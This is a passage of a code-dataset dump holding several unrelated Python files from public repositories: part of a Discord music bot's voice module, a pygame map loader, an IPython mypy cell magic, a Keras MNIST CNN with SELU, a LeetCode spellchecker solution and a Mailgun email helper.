self.loop.create_task(self.skip(autoplay=True, delay=5.0))\n else:\n self.loop.create_task(self.skip(autoplay=True))\n\n def set_previous_channel(self, channel: discord.TextChannel) -> None:\n \"\"\"Set previous_channel if needed\"\"\"\n\n if channel:\n self.previous_channel = channel\n\n def is_in_voice_channel(self) -> bool:\n \"\"\"Return True if voice client is connected to a voice channel\"\"\"\n\n return self.voice_client.is_connected() if isinstance(self.voice_client, discord.VoiceClient) else False\n\n def is_media_playing(self) -> bool:\n \"\"\"Return True if media is currently playing\"\"\"\n\n return self.voice_client.is_playing() if self.is_in_voice_channel() 
else False\n\n def is_media_paused(self) -> bool:\n \"\"\"Return True if media is currently paused\"\"\"\n\n return self.voice_client.is_paused() if self.is_in_voice_channel() else False\n\n def ytdl_entry_to_playerinfo(self, entry: dict) -> PlayerInfo:\n \"\"\"Parse Youtube-DL entry into PlayerInfo\"\"\"\n\n return PlayerInfo(\n title=entry.get(\"title\"),\n author=entry.get(\"uploader\"),\n thumbnail=entry.get(\"thumbnail\"),\n duration=entry.get(\"duration\"),\n url=entry.get(\"webpage_url\"),\n playback_url=entry.get(\"url\"),\n found=True if entry.get(\"url\") else False,\n from_ytdl=True\n )\n\n async def ytdl_fetch(\n self,\n request: str,\n as_playerinfo: bool = False,\n with_playlists: bool = False,\n playlistend: int = 0) -> Union[PlayerInfo, list, dict]:\n \"\"\"Fetch information about a given request using youtube-dl\n request: can either be a link or a text search\n Returns either a list or a PlayerInfo if as_playerinfo is True\"\"\"\n\n try:\n ytdl_opts = {\n \"format\": \"bestaudio/best\",\n \"outtmpl\": \"%(extractor)s-%(id)s-%(title)s.%(ext)s\",\n \"simulate\": True,\n \"skip_download\": True,\n \"playlistend\": self.player_queue_limit if playlistend <= 0 else playlistend,\n \"flat_playlist\": True,\n \"restrictfilenames\": True,\n \"nocheckcertificate\": True,\n \"ignoreerrors\": False,\n \"logtostderr\": False,\n \"quiet\": True,\n \"no_warnings\": True,\n \"default_search\": \"auto\",\n \"source_address\": \"0.0.0.0\",\n \"no_color\": True\n }\n\n if not with_playlists:\n ytdl_opts[\"noplaylist\"] = True\n\n error = \"No results for\"\n\n with youtube_dl.YoutubeDL(params=ytdl_opts) as ytdl:\n await self.loop.run_in_executor(None, ytdl.cache.remove)\n\n try:\n info = await asyncio.wait_for(\n self.loop.run_in_executor(\n None,\n lambda: ytdl.extract_info(\n url=request,\n download=False\n )),\n timeout=300.0\n )\n\n except asyncio.TimeoutError:\n logging.error(\"ytdl_fetch timed out for guild: {}: {}\".format(\n self.guild.id,\n request\n ))\n\n info = dict(entries=list())\n error = \"Request took too long (timed out)\"\n\n except Exception as e:\n logging.error(\"ytdl_fetch: {}\".format(e))\n\n info = dict(entries=list())\n error = str(e)[6:].strip()\n\n if as_playerinfo:\n entries = info.get(\"entries\", [info])\n\n if len(entries) == 0:\n return PlayerInfo(error=error)\n elif with_playlists:\n return [self.ytdl_entry_to_playerinfo(x) for x in entries]\n else:\n return self.ytdl_entry_to_playerinfo(entries[0])\n\n else:\n return info\n\n except Exception as e:\n logging.error(\"ytdl_fetch: {}\".format(e))\n return PlayerInfo(error=str(e)[6:].strip()) if as_playerinfo else dict()\n\n async def send_nothing_playing(self) -> None:\n \"\"\"Send a nothing is playing message to the previous channel\"\"\"\n\n await self.previous_channel.send(\n embed=embed_message(\n \"Nothing is playing\",\n discord.Color.blue()\n )\n )\n\n async def change_voice_state(self, self_mute: bool = False, self_deaf: bool = False) -> None:\n if self.is_in_voice_channel():\n await self.guild.change_voice_state(\n channel=self.voice_client.channel,\n self_mute=self_mute,\n self_deaf=self_deaf\n )\n\n async def _move_to(self, voice_channel: discord.VoiceChannel) -> None:\n await self.voice_client.move_to(voice_channel)\n\n while not self.voice_client.channel == voice_channel:\n await asyncio.sleep(0.1)\n\n async def join_voice_channel(self, voice_channel: discord.VoiceChannel) -> None:\n \"\"\"Join or move to a voice channel\"\"\"\n\n if not voice_channel.permissions_for(self.guild.me).connect:\n 
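# bail out early when the bot lacks permission to connect to this voice channel\n            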
await self.previous_channel.send(\n embed=embed_message(\n \"I do not have permission to join voice channel\",\n discord.Color.dark_red(),\n message=voice_channel.name\n )\n )\n return\n\n if self.is_in_voice_channel():\n if self.voice_client.channel == voice_channel:\n await self.previous_channel.send(\n embed=embed_message(\n \"I'm sorry Dave, I'm afraid I cannot duplicate myself\",\n discord.Color.dark_red()\n )\n )\n return\n\n try:\n await asyncio.wait_for(self._move_to(voice_channel), self.connect_timeout)\n self.last_active = time.time()\n\n if self.on_voice_join is not None:\n self.loop.create_task(self.on_voice_join(voice_channel, self))\n\n await self.previous_channel.send(\n embed=embed_message(\n \"I moved over to\",\n discord.Color.green(),\n voice_channel.name\n )\n )\n\n except Exception as e:\n logging.error(\"Unable to move to voice channel for guild: {}: {}\".format(\n self.guild.id,\n e\n ))\n await self.previous_channel.send(\n embed=embed_message(\n \"I cannot move to voice channel\",\n discord.Color.dark_red(),\n message=voice_channel.name\n )\n )\n\n else:\n try:\n self.voice_client = await voice_channel.connect(\n timeout=self.connect_timeout,\n reconnect=False\n )\n\n self.last_active = time.time()\n self.last_not_alone = time.time()\n try:\n self.inactivity_loop.start()\n\n except Exception as e:\n logging.error(\"Cannot start inactivity loop for guild: {}: {}\".format(\n self.guild.id,\n e\n ))\n\n if self.on_voice_join is not None:\n self.loop.create_task(self.on_voice_join(voice_channel, self))\n\n await self.previous_channel.send(\n embed=embed_message(\n \"Joined voice channel\",\n discord.Color.green(),\n message=self.voice_client.channel.name\n )\n )\n\n except Exception as e:\n logging.error(\"Unable to join voice channel for guild: {}: {}\".format(\n self.guild.id,\n e\n ))\n await self.previous_channel.send(\n embed=embed_message(\n \"I cannot join voice channel\",\n discord.Color.dark_red(),\n message=voice_channel.name\n )\n )\n\n async def join_member_voice_channel(self, member: discord.Member, channel: discord.TextChannel = None) -> None:\n \"\"\"Join or move to the voice channel the member is in\"\"\"\n\n self.set_previous_channel(channel)\n\n try:\n if member.voice:\n await self.join_voice_channel(member.voice.channel)\n\n else:\n await self.previous_channel.send(\n embed=embed_message(\n \"You must join a voice channel first\",\n discord.Color.dark_red()\n )\n )\n\n except Exception as e:\n logging.error(\"join_voice_channel: {}\".format(e))\n await self.previous_channel.send(\"Unexpected error:\\n```{}```\".format(e))\n\n async def leave_voice_channel(\n self,\n channel: discord.TextChannel = None,\n silent: bool = False,\n reason: str = None) -> None:\n \"\"\"Leave the connected voice channel\"\"\"\n\n self.set_previous_channel(channel)\n\n try:\n if self.is_in_voice_channel():\n if self.is_media_playing() or self.is_media_paused():\n self.autoplay = False\n self.voice_client.stop()\n\n self.player_info.clear()\n self.last_played = None\n voice_channel = self.voice_client.channel\n await self.voice_client.disconnect()\n\n if self.on_voice_leave is not None:\n self.loop.create_task(self.on_voice_leave(voice_channel, self))\n\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"Left voice channel{}\".format(\n \" ({})\".format(reason) if reason else \"\"\n ),\n discord.Color.red(),\n voice_channel.name\n )\n )\n\n elif not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"I'm sorry Dave, I'm afraid I 
wasn't connected to a voice channel\",\n discord.Color.red()\n )\n )\n\n self.player_busy = False\n\n except Exception as e:\n logging.error(\"leave_voice_channel: {}\".format(e))\n await self.previous_channel.send(\"Unexpected error:\\n```{}```\".format(e))\n\n async def play(\n self,\n request: Union[str, PlayerInfo],\n channel: discord.TextChannel = None,\n member: discord.Member = None,\n silent: bool = False,\n autoplay: bool = False,\n respect_duration_limit: bool = True,\n shuffle: bool = False) -> None:\n \"\"\"Play a media\n If request is not a PlayerInfo, it youtube-dl to fetch information\n silent: If True no messages will be sent to the previous text channel\n autoplay: whether autoplay should be enabled\n respect_duration_limit: If False, ignore the media duration limit\n shuffle: If True, shuffle playlists before adding them to the queue\"\"\"\n\n self.set_previous_channel(channel)\n\n fetch_before_play = True\n pinfos = None\n if isinstance(request, PlayerInfo):\n fetch_before_play = request.from_ytdl\n pinfo = request\n\n elif len(request) == 0:\n await self.previous_channel.send(\n embed=embed_message(\n \"You can't play emptiness\",\n discord.Color.dark_red()\n )\n )\n return\n\n else:\n async with self.previous_channel.typing():\n pinfos = await self.ytdl_fetch(\n request,\n as_playerinfo=True,\n with_playlists=True\n )\n\n if isinstance(pinfos, PlayerInfo):\n if not pinfos.found:\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n pinfos.short_error,\n discord.Color.dark_red(),\n message=request\n )\n )\n return\n\n pinfos = [pinfos] if pinfos.found else list()\n\n if shuffle:\n random.shuffle(pinfos)\n\n pinfo = pinfos[0]\n\n if len(pinfos) > 1:\n await self.player_queue_add(\n pinfos[1:],\n channel=None,\n silent=silent,\n shuffle=False\n )\n\n else:\n # If there is only one result, don't refresh the playback URLs\n # We don't disable the refresh if there are multiple results\n # because grabbing multiple results can take some time and the\n # playback URL can expire\n fetch_before_play = False\n\n if not self.is_in_voice_channel() and member:\n await self.join_member_voice_channel(member, self.previous_channel)\n\n if not self.is_in_voice_channel():\n await self.previous_channel.send(\n embed=embed_message(\n \"Cannot play media\",\n discord.Color.dark_red(),\n message=\"Not connected to a voice channel\"\n )\n )\n return\n\n if respect_duration_limit and pinfo.duration > self.duration_limit:\n await self.previous_channel.send(\n embed=pinfo.get_embed(\n \"Cannot play medias that last more than {} minutes\".format(int(self.duration_limit / 60)),\n discord.Color.gold()\n )\n )\n\n # Trigger callback as if media had been played to skip to the next\n self.autoplay = autoplay\n self.after_callback(None)\n return\n\n if self.player_busy:\n if not silent:\n await self.previous_channel.send(\n embed=pinfo.get_embed(\n \"The play requests are flowing too fast! 
Skipping this one\",\n discord.Color.gold()\n )\n )\n return\n\n self.player_busy = True # lock player\n self.last_active = time.time()\n try:\n if self.is_media_playing() or self.is_media_paused():\n # Always disable autoplay before stopping to prevent the callback to play something else\n self.autoplay = False\n self.voice_client.stop()\n\n if fetch_before_play:\n async with self.previous_channel.typing():\n # Always refresh the playback URL when fetched from youtube-dl to prevent expired URLs\n pinfo = await self.ytdl_fetch(\n pinfo.url,\n as_playerinfo=True\n )\n\n if not pinfo.found:\n raise Exception(pinfo.error)\n\n self.player_info = pinfo.copy()\n self.last_played = self.player_info.copy()\n\n if self.on_media_play is not None:\n self.loop.create_task(self.on_media_play(self.player_info.copy(), self))\n\n player = discord.PCMVolumeTransformer(\n discord.FFmpegPCMAudio(\n pinfo.playback_url,\n options=\"-vn\",\n before_options=\"-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5\" if pinfo.is_http() else \"\"\n ),\n volume=self.player_volume\n )\n\n self.voice_client.play(\n player,\n after=self.after_callback\n )\n\n if not silent:\n await self.previous_channel.send(\n embed=pinfo.get_embed(\n \"Now playing\",\n discord.Color.red()\n )\n )\n\n self.autoplay = autoplay\n\n except Exception as e:\n logging.error(\"play: {}\".format(e))\n await self.previous_channel.send(\"Unexpected error:\\n```{}```\".format(e))\n\n self.player_busy = False # unlock player\n\n async def skip(\n self,\n channel: discord.TextChannel = None,\n silent: bool = False,\n autoplay: bool = False,\n respect_duration_limit: bool = True,\n delay: float = None) -> None:\n \"\"\"Skip current media and play the next in queue\"\"\"\n\n if delay:\n logging.warning(\"Skip delayed by {} seconds for guild: {}\".format(\n delay,\n self.guild.id\n ))\n await asyncio.sleep(delay)\n\n self.set_previous_channel(channel)\n\n if len(self.player_queue) == 0:\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"There is nothing left to play\",\n discord.Color.blue()\n )\n )\n\n if not self.is_media_playing() and not self.is_media_paused():\n self.player_info.clear()\n\n else:\n await self.play(\n self.player_queue[0],\n channel=channel,\n member=None,\n silent=silent,\n autoplay=autoplay,\n respect_duration_limit=respect_duration_limit\n )\n del self.player_queue[0]\n\n async def stop(self, channel: discord.TextChannel = None, silent: bool = False) -> None:\n \"\"\"Stop any currently playing media and disable autoplay\"\"\"\n\n self.set_previous_channel(channel)\n\n self.autoplay = False\n if self.is_media_playing() or self.is_media_paused():\n self.voice_client.stop()\n\n if not silent:\n await self.previous_channel.send(\n embed=self.player_info.get_embed(\n \"Stopped playing\",\n discord.Color.dark_red()\n )\n )\n\n self.player_info.clear()\n\n else:\n if not silent:\n await self.send_nothing_playing()\n\n async def pause(self, channel: discord.TextChannel = None, silent: bool = False) -> None:\n \"\"\"Pause a playing media\"\"\"\n\n self.set_previous_channel(channel)\n\n if self.is_media_playing():\n self.voice_client.pause()\n\n if not silent:\n await self.previous_channel.send(\n embed=self.player_info.get_embed(\n \"Paused\",\n discord.Color.dark_blue()\n )\n )\n\n elif self.is_media_paused():\n if not silent:\n await self.previous_channel.send(\n embed=self.player_info.get_embed(\n \"Already paused\",\n discord.Color.dark_blue()\n )\n )\n\n else:\n if not silent:\n await 
self.send_nothing_playing()\n\n async def resume(self, channel: discord.TextChannel = None, silent: bool = False) -> None:\n \"\"\"Resume a paused media\"\"\"\n\n self.set_previous_channel(channel)\n\n if self.is_media_paused():\n self.voice_client.resume()\n\n if not silent:\n await self.previous_channel.send(\n embed=self.player_info.get_embed(\n \"Resumed\",\n discord.Color.red()\n )\n )\n\n elif self.is_media_playing():\n if not silent:\n await self.previous_channel.send(\n embed=self.player_info.get_embed(\n \"Already playing\",\n discord.Color.dark_red()\n )\n )\n\n else:\n if not silent:\n await self.send_nothing_playing()\n\n async def player_queue_add(\n self,\n request: Union[str, list, PlayerInfo],\n channel: discord.TextChannel = None,\n silent: bool = False,\n shuffle: bool = False) -> None:\n \"\"\"Add PlayerInfo or PlayerInfo list or request results (including playlists) to the player queue\"\"\"\n\n self.set_previous_channel(channel)\n\n if isinstance(request, PlayerInfo):\n pinfos = [request]\n\n else:\n if len(request) == 0:\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"I cannot add nothing to the player queue\",\n discord.Color.dark_red()\n )\n )\n return\n\n if isinstance(request, list):\n pinfos = request\n\n else:\n async with self.previous_channel.typing():\n pinfos = await self.ytdl_fetch(\n request,\n as_playerinfo=True,\n with_playlists=True\n )\n\n if isinstance(pinfos, PlayerInfo):\n if not pinfos.found:\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n pinfos.short_error,\n discord.Color.dark_red(),\n request\n )\n )\n return\n\n pinfos = [pinfos] if pinfos.found else list()\n\n if shuffle:\n random.shuffle(pinfos)\n\n if len(self.player_queue) >= self.player_queue_limit:\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"Cannot add more than {} songs to the player queue\".format(\n self.player_queue_limit\n ),\n discord.Color.gold()\n )\n )\n return\n\n added = 0\n playlist_embed = discord.Embed(color=discord.Color.green())\n for pinfo in pinfos:\n self.player_queue.append(pinfo)\n\n if added == 0:\n playlist_embed.title = pinfo.title\n playlist_embed.description = pinfo.author\n playlist_embed.url = pinfo.url\n if pinfo.thumbnail:\n playlist_embed.set_thumbnail(url=pinfo.thumbnail)\n\n elif added <= 19:\n playlist_embed.add_field(\n name=pinfo.title,\n value=pinfo.author,\n inline=False\n )\n\n added += 1\n\n if len(self.player_queue) >= self.player_queue_limit:\n if not silent and len(pinfos) > added:\n await self.previous_channel.send(\n embed=embed_message(\n \"Discarded {} songs because the player queue is full\".format(\n len(pinfos) - added\n ),\n discord.Color.dark_red()\n )\n )\n break\n\n if added > 19:\n remaining = added - 19\n playlist_embed.add_field(\n name=\"...\",\n value=\"+ {} song{}\".format(\n remaining,\n \"s\" if remaining != 1 else \"\"\n ),\n inline=False\n )\n\n if added == 1:\n playlist_embed.set_author(name=\"Song added to the player queue\")\n\n else:\n playlist_embed.set_author(name=\"Added {} songs to the player queue\".format(\n added\n ))\n\n if not silent:\n await self.previous_channel.send(embed=playlist_embed)\n\n async def player_queue_clear(self, channel: discord.TextChannel, silent: bool = False) -> None:\n \"\"\"Clear player queue\"\"\"\n\n self.set_previous_channel(channel)\n\n self.player_queue.clear()\n\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"Player queue was cleared\",\n 
discord.Color.dark_blue()\n )\n )\n\n async def player_queue_shuffle(self, channel: discord.TextChannel, silent: bool = False) -> None:\n \"\"\"Shuffle player queue\"\"\"\n\n self.set_previous_channel(channel)\n\n if len(self.player_queue) == 0:\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"Player queue is empty\",\n discord.Color.dark_blue()\n )\n )\n return\n\n random.shuffle(self.player_queue)\n\n if not silent:\n await self.previous_channel.send(\n embed=embed_message(\n \"Shuffled player queue\",\n discord.Color.blue()\n )\n )\n\n def player_queue_set_limit(self, limit: int) -> None:\n \"\"\"Set the player queue limit\"\"\"\n\n if limit <= 0:\n return\n\n self.player_queue_limit = limit\n\n while len(self.player_queue) > self.player_queue_limit:\n self.player_queue.pop()\n\n def set_volume(self, volume: float) -> None:\n \"\"\"Set player volume\"\"\"\n\n volume = round(volume, 2)\n if volume > self.player_volume_limit:\n volume = self.player_volume_limit\n\n self.player_volume = volume\n if self.is_media_playing() or self.is_media_paused():\n self.voice_client.source.volume = self.player_volume\n\n def set_volume_limit(self, volume: float) -> None:\n \"\"\"Set volume limit\"\"\"\n\n self.player_volume_limit = round(volume, 2)\n self.apply_volume_limit()\n\n def apply_volume_limit(self) -> None:\n \"\"\"Make sure that the volume limit is respected\"\"\"\n\n if self.player_volume > self.player_volume_limit:\n self.set_volume(self.player_volume_limit)","repo_name":"hoot-w00t/marcel-the-bot","sub_path":"marcel/voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":34050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6808461187","text":"import os\nimport pandas as pd\nimport pygame\nfrom typing import List\n\nfrom matplotlib import pyplot as plt\nfrom pandas import DataFrame\n\nfrom src.game.gamelogic import weapon\nfrom src.game.gamelogic.item import Item\nfrom src.game.gamelogic.weapon import WeaponType\n\nfrom src.game.gamelogic.background_music import Music\n\n\nclass Map:\n solid_df: DataFrame\n staticimages = list() # type: List[pygame.surface.Surface]\n player_uris = list() # type: List[str]\n\n def __init__(self, game, uri: str) -> None:\n \"\"\"\n Initialize a new instance of the Inventory class.\n\n :param game: The instance of the game\n :param uri: A string containing the path to the directory.\n \"\"\"\n self.game = game\n self.directory = uri\n self.items = list() # type: ignore[var-annotated]\n self.weapon_path = {\n weapon.WeaponType.Sword.name: self.directory + \"\\\\waffen\\\\schwert\\\\Sword.png\",\n weapon.WeaponType.Laser.name: self.directory + \"\\\\waffen\\\\laser\\\\laser.png\"\n }\n self.music = None\n self.music_load()\n\n # load background\n try:\n self.background = pygame.image.load(uri + r'/background.png').convert_alpha()\n except:\n self.background = \"no image found\" # type: ignore[assignment]\n\n # load player images\n for directory in next(os.walk(self.directory + r'\\player\\animation'))[1]:\n if directory[-3:] == 'png':\n print(str(directory) + ' is no folder')\n continue\n self.player_uris.append(os.path.join(self.directory + r'\\player\\animation', directory))\n print(\"directory:\", os.path.join(self.directory + r'\\player', directory))\n\n # load solid images and add solid pixels to solid list\n for filename in os.listdir(self.directory + r'/solid'):\n simg = os.path.join(self.directory + r'/solid', filename)\n if not 
os.path.isfile(simg):\n print(str(simg) + ' is not a file')\n continue\n\n # load image for displaying\n try:\n img = pygame.image.load(simg)\n img = img.convert_alpha()\n except:\n continue\n print(str(simg) + ' successfully loaded into pygame')\n self.staticimages.append(img)\n\n # combine all static images into one, then use laplace to detect edges.\n # use these to generate array of edge pixels and save it in solid.\n solid = list()\n solid_images = self.staticimages.copy()\n if len(solid_images) != 0:\n combinded_solid_image = solid_images.pop()\n for image in solid_images:\n combinded_solid_image.blit(image, (0, 0))\n combinded_solid_image = combinded_solid_image.convert_alpha()\n self.edge_surface = pygame.transform.laplacian(combinded_solid_image).convert_alpha()\n alpha_array = pygame.surfarray.pixels_alpha(self.edge_surface)\n alpha_array = alpha_array.swapaxes(0, 1)\n for yi, y in enumerate(alpha_array):\n for xi, x in enumerate(y):\n if x > 100:\n solid.append((xi, yi))\n\n # Add surface borders\n # vertical edges\n for y in range(-self.game.height, self.game.height):\n solid.append((0, y))\n solid.append((self.game.width, y))\n\n self.solid_df = pd.DataFrame(solid, columns=['x', 'y'])\n\n # generate one picture out of all solid and not solid images.\n comb_images = self.staticimages.copy()\n if len(comb_images) != 0:\n self.static_objects_img = comb_images.pop()\n for image in comb_images:\n self.static_objects_img.blit(image, (0, 0))\n self.static_objects_img = self.static_objects_img.convert_alpha()\n\n def setitems(self, item_dict) -> None:\n \"\"\"\n Set the items on the game board based on the item dictionary.\n :param item_dict: Dictionary containing weapon names as keys and a list of positions as values.\n \"\"\"\n # Iterate through each item in the dictionary\n for k, v in item_dict.items():\n # Iterate through each position for the current item\n for pos in v:\n # Check if the item is already in the game\n if not list(map(lambda i: [i.x, i.y], self.items)).__contains__(pos):\n # Create a new Item object for the current position and add it to the game's items list\n self.items.append(Item(WeaponType.getObj(k), pos, self.weapon_path[k]))\n\n # Iterate through each item in the game's items list\n for i in self.items:\n # Check if the item's position is in the dictionary\n if not item_dict[i.type.name].__contains__([i.x, i.y]):\n # If the item is not in the dictionary, remove it from the game's items list\n self.items.remove(i)\n\n def draw_items(self, screen: pygame.Surface) -> None:\n \"\"\"\n Draw all items in the game on the given screen.\n\n :param screen: The surface on which to draw the items.\n \"\"\"\n for i in self.items:\n i.draw(screen)\n\n def draw_background(self, screen: pygame.Surface) -> None:\n \"\"\"\n Draws the game background on the screen using Pygame blit function\n\n :param screen: Pygame screen object to blit the background on\n :return: None\n \"\"\"\n canvas_rec = pygame.Rect(0, 0, self.game.width, self.game.height)\n if isinstance(self.background, pygame.Surface):\n screen.blit(self.background, canvas_rec)\n\n def draw_solids(self, screen: pygame.Surface) -> None:\n \"\"\"\n Draw the static objects (solids) on the screen\n\n :param screen: Pygame screen object to blit the solids on\n \"\"\"\n canvas_rec = pygame.Rect(0, 0, self.game.width, self.game.height)\n if len(self.staticimages) != 0:\n screen.blit(self.static_objects_img, canvas_rec)\n\n def music_load(self):\n \"\"\"\n Loads the music from the folder and starts playing it\n :return:\n 
\"\"\"\n # Load Music\n self.music = Music(self.directory + r\"\\music\", 1.0)\n # Start Music\n self.music.play() # type: ignore[attr-defined]\n","repo_name":"chips199/Projektpraktikum","sub_path":"src/game/gamelogic/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":6370,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"74010000145","text":"\"\"\"\nAdd mypy type-checking cell magic to jupyter/ipython.\n\nSave this script to your ipython profile's startup directory.\n\nIPython's directories can be found via `ipython locate [profile]` to find the current ipython directory and ipython profile directory, respectively.\n\nFor example, this file could exist on a path like this on mac:\n\n/Users/yourusername/.ipython/profile_default/startup/typecheck.py\n\nwhere /Users/yourusername/.ipython/profile_default/ is the ipython directory for\nthe default profile.\n\nThe line magic is called \"typecheck\" to avoid namespace conflict with the mypy\npackage.\n\n\"\"\"\n\nfrom IPython.core.magic import register_cell_magic\n\n\n@register_cell_magic\ndef typecheck(line, cell):\n \"\"\"\n Run the following cell though mypy.\n\n Any parameters that would normally be passed to the mypy cli\n can be passed on the first line, with the exception of the\n -c flag we use to pass the code from the cell we want to execute\n\n i.e.\n\n %%typecheck --ignore-missing-imports\n ...\n ...\n ...\n\n mypy stdout and stderr will print prior to output of cell. If there are no conflicts,\n nothing will be printed by mypy.\n \"\"\"\n\n from IPython import get_ipython\n from mypy import api\n\n mypy_result = api.run(line.split() + ['-c', cell])\n\n if mypy_result[0]: # print mypy stdout\n print(mypy_result[0])\n\n if mypy_result[1]: # print mypy stderr\n print(mypy_result[1])\n\n shell = get_ipython()\n shell.run_cell(cell)","repo_name":"knowsuchagency/jupyter-mypy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"15944462372","text":"# Adapted KERAS tutorial \n\nfrom __future__ import print_function\nimport keras\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, AlphaDropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras import backend as K\n\nbatch_size = 128\nnum_classes = 10\nepochs = 30\n\n# input image dimensions\nimg_rows, img_cols = 28, 28\n\n# the data, shuffled and split between train and test sets\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\nif K.image_data_format() == 'channels_first':\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\nelse:\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nx_train /= 255\n# x_train = (x_train - np.mean(x_train))/np.std(x_train)\n\nx_test /= 255\n# x_test = (x_test - np.mean(x_train))/np.std(x_train)\n\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\n# convert class vectors to binary class matrices\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = 
keras.utils.to_categorical(y_test, num_classes)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3), activation='selu', input_shape=input_shape, kernel_initializer='lecun_normal',\n bias_initializer='zeros'))\nmodel.add(Conv2D(64, (3, 3), activation='selu', kernel_initializer='lecun_normal', bias_initializer='zeros'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(AlphaDropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(512, activation='selu', kernel_initializer='lecun_normal', bias_initializer='zeros'))\nmodel.add(AlphaDropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax', kernel_initializer='lecun_normal', bias_initializer='zeros'))\n\nmodel.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adadelta(), metrics=['accuracy'])\n\nmodel.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(x_test, y_test))\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n\nf = open('MNIST_SELU_results.txt', 'a')\nf.write('Test loss:' + str(score[0]) + ' Test accuracy:' + str(score[1]) + '\\n') # python will convert \\n to os.linesep\nf.close()\n","repo_name":"26hzhang/AmusingPythonCodes","sub_path":"snns/keras-cnn/MNIST-Conv-SELU.py","file_name":"MNIST-Conv-SELU.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"48"} +{"seq_id":"7825143914","text":"def replace_aeiou(w):\n for c in 'aeiou':\n w = w.replace(c, \"~\")\n return w\n\n\nclass Solution(object):\n def spellchecker(self, wordlist, queries):\n \"\"\"\n :type wordlist: List[str]\n :type queries: List[str]\n :rtype: List[str]\n \"\"\"\n direct = set(wordlist)\n to_lower = dict()\n replace = dict()\n for w in wordlist:\n lower = w.lower()\n if lower not in to_lower.keys():\n to_lower[lower] = w\n for c in 'aeiou':\n lower = lower.replace(c, \"~\")\n if lower not in replace.keys():\n replace[lower] = w\n\n r = [\"\"] * len(queries)\n for i, q in enumerate(queries):\n if q in direct:\n r[i] = q\n\n queries = [(x.lower(), i) for i, x in enumerate(queries) if not r[i]]\n for lower, i in queries:\n r[i] = to_lower.get(lower, \"\")\n\n queries = [(replace_aeiou(x), i) for x, i in queries if not r[i]]\n for r_, i in queries:\n r[i] = replace.get(r_, \"\")\n return r\n\n\ns = Solution()\nprint(s.spellchecker(wordlist = [\"KiTe\",\"kite\",\"hare\",\"Hare\", \"iaf\"], queries = [\"kite\",\"Kite\",\"KiTe\",\"Hare\",\"HARE\",\"Hear\",\"hear\",\"keti\",\"keet\",\"keto\", \"AIF\"]))\n","repo_name":"0as1s/leetcode","sub_path":"966_spellChecker.py","file_name":"966_spellChecker.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14506046745","text":"import requests\nimport datetime\n\n\ndef get_email_stored_events(api_key, endpoint):\n yesterday = datetime.datetime.now() - datetime.timedelta(1)\n return requests.get(\n '{}/events'.format(endpoint),\n auth=('api', api_key),\n params={\n 'begin': yesterday.isoformat(),\n 'ascending': 'yes',\n 'limit': 1\n }\n )\n\n\ndef get_stored_email_urls(api_key, endpoint):\n response = get_email_stored_events(api_key, endpoint)\n data = response.json()\n\n for item in data.get('items', []):\n if 'storage' in item:\n if 'url' in item['storage']:\n yield item['storage']['url']\n\n\ndef get_message(api_key, url):\n return requests.get(\n url,\n auth=('api', api_key)\n )\n\n\ndef 
send_message(api_key, endpoint, name, subject, text, from_address, recipients):\n    \"\"\"\n    * name: Display name used in the From header.\n    * subject: Subject of the email.\n    * text: Text body of the email.\n    * from_address: The email address that the message will be sent from.\n    * recipients: A list of recipient email addresses.\n    \"\"\"\n    return requests.post(\n        endpoint,\n        auth=('api', api_key),\n        data={\n            'from': '%s <%s>' % (name, from_address),\n            'to': recipients,\n            'subject': subject,\n            'text': text\n        }\n    )\n","repo_name":"NoobSolver/Chatbot","sub_path":"Chatterbot/api/mailgun.py","file_name":"mailgun.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"}
